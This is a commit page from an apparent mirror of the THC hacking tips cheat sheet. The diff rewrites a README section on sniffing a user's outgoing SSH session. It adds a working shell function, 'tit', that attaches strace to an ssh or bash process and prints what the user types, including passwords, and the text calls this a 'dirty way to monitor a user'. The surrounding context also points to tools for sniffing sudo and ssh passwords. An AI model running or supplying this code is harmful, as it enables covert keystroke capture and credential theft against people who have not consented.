CalvinBackup/thc-tips-tricks-hacks-cheat-sheet
1
0
Fork 0
mirror of https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet.git synced 2026-05-30 19:19:37 +02:00
Code Issues Packages Projects Releases Wiki Activity

Update README.md

Browse Source
This commit is contained in:
skyper
2024-08-28 16:47:19 +01:00
committed by GitHub
parent a3dcdae6a7
commit b5218e815f
1 changed files with 6 additions and 2 deletions
Download Patch File Download Diff File Expand all files Collapse all files
README.md
+6 -2
View File
@@ -2050,9 +2050,13 @@ Check out our very own [eBPF tools to sniff sudo/su/ssh passwords](https://githu
<a id="ssh-sniffing-strace"></a>
**10.iv Sniff a user's outgoing SSH session with strace**
```sh
strace -e trace=read -p <PID> 2>&1 | while read x; do echo "$x" | grep '^read.*= [1-9]$' | cut -f2 -d\"; done
tit() {
strace -e trace=read -p "${1:?}" 2>&1 | stdbuf -oL grep '^read.*= [1-9]$' | awk 'BEGIN{FS="\"";}{if ($2=="\\r"){print ""}else{printf $2}}'
}
# tit $(pidof -s ssh)
# tit $(pidof -s bash)
```
Dirty way to monitor a user who is using *ssh* to connect to another host from a computer that you control.
Dirty way to monitor a user who is using *ssh* or their shell to connect to another host from a computer that you control.
<a id="ssh-sniffing-wrapper"></a>